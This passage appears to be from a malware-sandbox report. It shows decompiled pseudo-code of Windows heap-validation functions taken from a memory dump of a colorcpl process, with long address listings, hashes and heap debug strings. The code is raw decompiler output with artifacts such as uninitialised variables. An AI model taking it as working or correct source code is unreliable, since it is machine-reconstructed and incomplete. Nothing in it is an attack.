													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E06E3A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E06E3A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E06E3BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E06EC23E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E06E11F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                                                                                0x06ed4af7
                                                                                                0x06ed4afb
                                                                                                0x06ed4afd
                                                                                                0x06ed4b01
                                                                                                0x06ed4b03
                                                                                                0x06ed4b08
                                                                                                0x06ed4b0a
                                                                                                0x06ed4b0f
                                                                                                0x06ed4eb5
                                                                                                0x06ed4eb5
                                                                                                0x06ed4ebb
                                                                                                0x06ed50d5
                                                                                                0x06ed50d8
                                                                                                0x06ed4ff6
                                                                                                0x00000000
                                                                                                0x06ed4ff6
                                                                                                0x06ed50de
                                                                                                0x06ed50e4
                                                                                                0x06ed50e8
                                                                                                0x06ed5107
                                                                                                0x06ed510c
                                                                                                0x06ed50ea
                                                                                                0x06ed50ff
                                                                                                0x06ed5104
                                                                                                0x06ed5112
                                                                                                0x06ed5115
                                                                                                0x06ed5118
                                                                                                0x06ed5119
                                                                                                0x06ed50cb
                                                                                                0x06ed50cb
                                                                                                0x06ed50af
                                                                                                0x00000000
                                                                                                0x06ed50af
                                                                                                0x06ed4ecb
                                                                                                0x06ed50b6
                                                                                                0x06ed50bb
                                                                                                0x06ed4ed1
                                                                                                0x06ed4ee6
                                                                                                0x06ed4eeb
                                                                                                0x06ed50c1
                                                                                                0x06ed50c2
                                                                                                0x06ed50c5
                                                                                                0x06ed50c6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4b15
                                                                                                0x06ed4b15
                                                                                                0x06ed4b1c
                                                                                                0x06ed4b1e
                                                                                                0x06ed4b23
                                                                                                0x06ed4b27
                                                                                                0x06ed4b33
                                                                                                0x06ed4b38
                                                                                                0x06ed4b3a
                                                                                                0x06ed4b3c
                                                                                                0x06ed4b41
                                                                                                0x06ed4b41
                                                                                                0x06ed4b3a
                                                                                                0x06ed4b52
                                                                                                0x06ed5045
                                                                                                0x06ed504b
                                                                                                0x06ed504f
                                                                                                0x06ed506e
                                                                                                0x06ed5073
                                                                                                0x06ed5051
                                                                                                0x06ed5066
                                                                                                0x06ed506b
                                                                                                0x06ed5083
                                                                                                0x06ed5088
                                                                                                0x06ed5088
                                                                                                0x06ed508a
                                                                                                0x06ed5091
                                                                                                0x06ed5099
                                                                                                0x06ed5099
                                                                                                0x06ed509d
                                                                                                0x06ed50a7
                                                                                                0x06ed50ad
                                                                                                0x06ed50ad
                                                                                                0x06ed50ad
                                                                                                0x00000000
                                                                                                0x06ed509d
                                                                                                0x06ed4b58
                                                                                                0x06ed4b5b
                                                                                                0x06ed4b5e
                                                                                                0x06ed4b63
                                                                                                0x06ed4b66
                                                                                                0x06ed4b69
                                                                                                0x06ed4b6f
                                                                                                0x06ed4be4
                                                                                                0x06ed4bf0
                                                                                                0x06ed4bf2
                                                                                                0x06ed4bf5
                                                                                                0x06ed4dc3
                                                                                                0x06ed4dc6
                                                                                                0x06ed4dc9
                                                                                                0x06ed4dce
                                                                                                0x06ed4dce
                                                                                                0x06ed4dd0
                                                                                                0x06ed4dd0
                                                                                                0x06ed4dd5
                                                                                                0x06ed4def
                                                                                                0x06ed4dd7
                                                                                                0x06ed4de7
                                                                                                0x06ed4de7
                                                                                                0x06ed4df3
                                                                                                0x06ed5001
                                                                                                0x06ed5007
                                                                                                0x06ed500b
                                                                                                0x06ed502a
                                                                                                0x06ed502f
                                                                                                0x06ed500d
                                                                                                0x06ed5022
                                                                                                0x06ed5027
                                                                                                0x06ed5039
                                                                                                0x06ed503a
                                                                                                0x06ed503b
                                                                                                0x00000000
                                                                                                0x06ed4df9
                                                                                                0x06ed4dfd
                                                                                                0x06ed4e90
                                                                                                0x06ed4e94
                                                                                                0x06ed4e9e
                                                                                                0x06ed4ea4
                                                                                                0x06ed4ea4
                                                                                                0x06ed4ea4
                                                                                                0x06ed4ea6
                                                                                                0x06ed4ea6
                                                                                                0x00000000
                                                                                                0x06ed4ea6
                                                                                                0x06ed4e03
                                                                                                0x06ed4e08
                                                                                                0x06ed4f88
                                                                                                0x06ed4f92
                                                                                                0x06ed4f99
                                                                                                0x06ed4f9c
                                                                                                0x06ed4fe0
                                                                                                0x06ed4fe4
                                                                                                0x06ed4fee
                                                                                                0x06ed4ff4
                                                                                                0x06ed4ff4
                                                                                                0x06ed4ff4
                                                                                                0x00000000
                                                                                                0x06ed4fe4
                                                                                                0x06ed4f9e
                                                                                                0x06ed4fa4
                                                                                                0x06ed4fa8
                                                                                                0x06ed4fc7
                                                                                                0x06ed4fcc
                                                                                                0x06ed4faa
                                                                                                0x06ed4fbf
                                                                                                0x06ed4fc4
                                                                                                0x06ed4fd2
                                                                                                0x06ed4fd5
                                                                                                0x06ed4fd6
                                                                                                0x06ed4f34
                                                                                                0x06ed4f34
                                                                                                0x00000000
                                                                                                0x06ed4f39
                                                                                                0x06ed4e0e
                                                                                                0x06ed4e14
                                                                                                0x06ed4e1b
                                                                                                0x06ed4e25
                                                                                                0x06ed4e2b
                                                                                                0x06ed4e2b
                                                                                                0x06ed4e33
                                                                                                0x06ed4e38
                                                                                                0x06ed4e8a
                                                                                                0x06ed4e8a
                                                                                                0x00000000
                                                                                                0x06ed4e3a
                                                                                                0x06ed4e3e
                                                                                                0x06ed4e43
                                                                                                0x06ed4e47
                                                                                                0x06ed4e53
                                                                                                0x06ed4e58
                                                                                                0x06ed4e5a
                                                                                                0x06ed4e5c
                                                                                                0x06ed4e61
                                                                                                0x06ed4e61
                                                                                                0x06ed4e5a
                                                                                                0x06ed4e6e
                                                                                                0x06ed4f41
                                                                                                0x06ed4f47
                                                                                                0x06ed4f4b
                                                                                                0x06ed4f6a
                                                                                                0x06ed4f6f
                                                                                                0x06ed4f4d
                                                                                                0x06ed4f62
                                                                                                0x06ed4f67
                                                                                                0x06ed4f7f
                                                                                                0x06ed4f80
                                                                                                0x06ed4f81
                                                                                                0x00000000
                                                                                                0x06ed4e74
                                                                                                0x06ed4e78
                                                                                                0x06ed4e82
                                                                                                0x06ed4e88
                                                                                                0x06ed4e88
                                                                                                0x00000000
                                                                                                0x06ed4e78
                                                                                                0x06ed4e6e
                                                                                                0x06ed4e38
                                                                                                0x06ed4df3
                                                                                                0x06ed4bfe
                                                                                                0x06ed4c01
                                                                                                0x06ed4c04
                                                                                                0x06ed4c07
                                                                                                0x06ed4c09
                                                                                                0x06ed4c0c
                                                                                                0x06ed4c0e
                                                                                                0x06ed4c0e
                                                                                                0x06ed4c11
                                                                                                0x06ed4c11
                                                                                                0x06ed4c0c
                                                                                                0x06ed4c14
                                                                                                0x06ed4c17
                                                                                                0x06ed4dae
                                                                                                0x06ed4db2
                                                                                                0x06ed4db7
                                                                                                0x06ed4dba
                                                                                                0x06ed4dbd
                                                                                                0x06ed4ef1
                                                                                                0x06ed4ef7
                                                                                                0x06ed4efb
                                                                                                0x06ed4f1a
                                                                                                0x06ed4f1f
                                                                                                0x06ed4efd
                                                                                                0x06ed4f12
                                                                                                0x06ed4f17
                                                                                                0x06ed4f2b
                                                                                                0x06ed4f2b
                                                                                                0x06ed4f2d
                                                                                                0x06ed4f2e
                                                                                                0x06ed4f2f
                                                                                                0x00000000
                                                                                                0x06ed4f2f
                                                                                                0x00000000
                                                                                                0x06ed4c1d
                                                                                                0x06ed4c1d
                                                                                                0x06ed4c20
                                                                                                0x06ed4c23
                                                                                                0x06ed4c26
                                                                                                0x06ed4c29
                                                                                                0x06ed4c2c
                                                                                                0x06ed4c2e
                                                                                                0x06ed4d91
                                                                                                0x06ed4d91
                                                                                                0x06ed4d92
                                                                                                0x06ed4d97
                                                                                                0x06ed4d9e
                                                                                                0x00000000
                                                                                                0x06ed4d9e
                                                                                                0x06ed4c34
                                                                                                0x06ed4c37
                                                                                                0x06ed4c39
                                                                                                0x06ed4c3c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4c45
                                                                                                0x06ed4c48
                                                                                                0x06ed4c4e
                                                                                                0x06ed4c50
                                                                                                0x06ed4c78
                                                                                                0x06ed4c78
                                                                                                0x06ed4c7b
                                                                                                0x06ed4c7d
                                                                                                0x06ed4c80
                                                                                                0x06ed4c84
                                                                                                0x06ed4cad
                                                                                                0x06ed4cad
                                                                                                0x06ed4cb0
                                                                                                0x06ed4cb8
                                                                                                0x06ed4cbb
                                                                                                0x06ed4cbe
                                                                                                0x06ed4cc1
                                                                                                0x06ed4cc7
                                                                                                0x06ed4cdc
                                                                                                0x06ed4cc9
                                                                                                0x06ed4cd2
                                                                                                0x06ed4cd4
                                                                                                0x06ed4cd4
                                                                                                0x06ed4cde
                                                                                                0x06ed4ce0
                                                                                                0x06ed4d13
                                                                                                0x06ed4d13
                                                                                                0x06ed4d16
                                                                                                0x06ed4d18
                                                                                                0x06ed4d29
                                                                                                0x06ed4d2a
                                                                                                0x06ed4d2c
                                                                                                0x06ed4d34
                                                                                                0x06ed4d1a
                                                                                                0x06ed4d1a
                                                                                                0x06ed4d1a
                                                                                                0x06ed4d1d
                                                                                                0x06ed4d1f
                                                                                                0x06ed4d22
                                                                                                0x06ed4d24
                                                                                                0x06ed4d24
                                                                                                0x06ed4d3c
                                                                                                0x06ed4d3f
                                                                                                0x06ed4d45
                                                                                                0x06ed4d47
                                                                                                0x06ed4d6c
                                                                                                0x06ed4d6c
                                                                                                0x06ed4d70
                                                                                                0x06ed4d7e
                                                                                                0x06ed4d84
                                                                                                0x06ed4d84
                                                                                                0x00000000
                                                                                                0x06ed4d49
                                                                                                0x06ed4d49
                                                                                                0x06ed4d56
                                                                                                0x06ed4d56
                                                                                                0x06ed4d59
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4d4e
                                                                                                0x06ed4d50
                                                                                                0x06ed4d52
                                                                                                0x06ed4d8e
                                                                                                0x06ed4d5d
                                                                                                0x06ed4d5f
                                                                                                0x06ed4d67
                                                                                                0x00000000
                                                                                                0x06ed4d67
                                                                                                0x06ed4d54
                                                                                                0x06ed4d54
                                                                                                0x06ed4d5b
                                                                                                0x00000000
                                                                                                0x06ed4d5b
                                                                                                0x06ed4ce2
                                                                                                0x06ed4ce2
                                                                                                0x06ed4ce5
                                                                                                0x06ed4ce5
                                                                                                0x06ed4ce7
                                                                                                0x06ed4cfb
                                                                                                0x06ed4ce9
                                                                                                0x06ed4ce9
                                                                                                0x06ed4cec
                                                                                                0x06ed4cef
                                                                                                0x06ed4cf1
                                                                                                0x06ed4cf3
                                                                                                0x06ed4cf3
                                                                                                0x06ed4cf3
                                                                                                0x06ed4cf6
                                                                                                0x06ed4cf6
                                                                                                0x06ed4d02
                                                                                                0x06ed4d05
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4d07
                                                                                                0x06ed4d0f
                                                                                                0x06ed4d11
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4d11
                                                                                                0x00000000
                                                                                                0x06ed4ce5
                                                                                                0x06ed4ce0
                                                                                                0x06ed4c8a
                                                                                                0x06ed4c8f
                                                                                                0x06ed4c91
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4c9d
                                                                                                0x00000000
                                                                                                0x06ed4c9d
                                                                                                0x06ed4c52
                                                                                                0x06ed4c5f
                                                                                                0x06ed4c5f
                                                                                                0x06ed4c62
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4c57
                                                                                                0x06ed4c59
                                                                                                0x06ed4c5b
                                                                                                0x06ed4caa
                                                                                                0x06ed4c66
                                                                                                0x06ed4c68
                                                                                                0x06ed4c70
                                                                                                0x06ed4c75
                                                                                                0x00000000
                                                                                                0x06ed4c75
                                                                                                0x06ed4c5d
                                                                                                0x06ed4c5d
                                                                                                0x06ed4c64
                                                                                                0x00000000
                                                                                                0x06ed4c64
                                                                                                0x06ed4c17
                                                                                                0x06ed4b75
                                                                                                0x06ed4bc4
                                                                                                0x06ed4bc8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4bd9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4b77
                                                                                                0x06ed4b7a
                                                                                                0x06ed4b8c
                                                                                                0x06ed4b7c
                                                                                                0x06ed4b7e
                                                                                                0x06ed4b83
                                                                                                0x06ed4b86
                                                                                                0x06ed4b86
                                                                                                0x06ed4b90
                                                                                                0x06ed4b93
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4b95
                                                                                                0x06ed4bab
                                                                                                0x06ed4bb0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4bb2
                                                                                                0x06ed4bb9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4bbb
                                                                                                0x06ed4bbe
                                                                                                0x06ed4bc1
                                                                                                0x06ed4bc1
                                                                                                0x00000000
                                                                                                0x06ed4bc1
                                                                                                0x06ed4b97
                                                                                                0x06ed4ba4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4ba6
                                                                                                0x00000000
                                                                                                0x06ed4ba6
                                                                                                0x06ed4ea9
                                                                                                0x06ed4ea9
                                                                                                0x06ed4eb2
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                • API String ID: 0-3591852110
                                                                                                • Opcode ID: f0ed04c5ac2fcaa4f24546a761632241a7aef59eca8f780df85b28d90d487743
                                                                                                • Instruction ID: ca52ffa7b752c50d9caf386943623fb42a2297106531b6ee54282dd8a1c5e543
                                                                                                • Opcode Fuzzy Hash: f0ed04c5ac2fcaa4f24546a761632241a7aef59eca8f780df85b28d90d487743
                                                                                                • Instruction Fuzzy Hash: 1E12F270610741EFD7A5CF28C885BBAB7F5FF18308F15A459E8968B681D734E886CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06ED4496 Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 56%
                                                                                                			E06ED4496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E06ED49A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x6f06378 = _t267;
						asm("int3");
						 *0x6f06378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E06E4174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E06E1B150();
							} else {
								E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E06E1B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E06E1B150();
							} else {
								E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E06E1B150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x6f06350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E06E59660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E06E4174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E06E1B150();
										} else {
											E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E06E1B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E06E1B150();
									} else {
										E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E06E1B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E06E1B150();
								} else {
									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E06E1B150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E06E1B150();
							} else {
								E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E06ED4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E06ECFA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E06EC23E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                                                                                0x06ed44a1
                                                                                                0x06ed44a3
                                                                                                0x06ed44a7
                                                                                                0x06ed44ac
                                                                                                0x06ed44af
                                                                                                0x06ed44b2
                                                                                                0x06ed44b9
                                                                                                0x06ed44bc
                                                                                                0x06ed47f2
                                                                                                0x06ed47f2
                                                                                                0x06ed47f8
                                                                                                0x06ed47fc
                                                                                                0x06ed47fe
                                                                                                0x06ed4804
                                                                                                0x06ed4805
                                                                                                0x06ed4805
                                                                                                0x06ed480c
                                                                                                0x06ed4810
                                                                                                0x06ed4812
                                                                                                0x06ed4812
                                                                                                0x06ed4812
                                                                                                0x06ed4822
                                                                                                0x06ed4822
                                                                                                0x06ed4827
                                                                                                0x06ed4827
                                                                                                0x00000000
                                                                                                0x06ed4827
                                                                                                0x06ed44c4
                                                                                                0x06ed44d3
                                                                                                0x06ed44d9
                                                                                                0x06ed44dc
                                                                                                0x06ed44de
                                                                                                0x06ed44e0
                                                                                                0x06ed4560
                                                                                                0x06ed4520
                                                                                                0x06ed4522
                                                                                                0x06ed4525
                                                                                                0x06ed4528
                                                                                                0x06ed452b
                                                                                                0x06ed452e
                                                                                                0x06ed4530
                                                                                                0x06ed4697
                                                                                                0x06ed469d
                                                                                                0x06ed46a1
                                                                                                0x06ed46c0
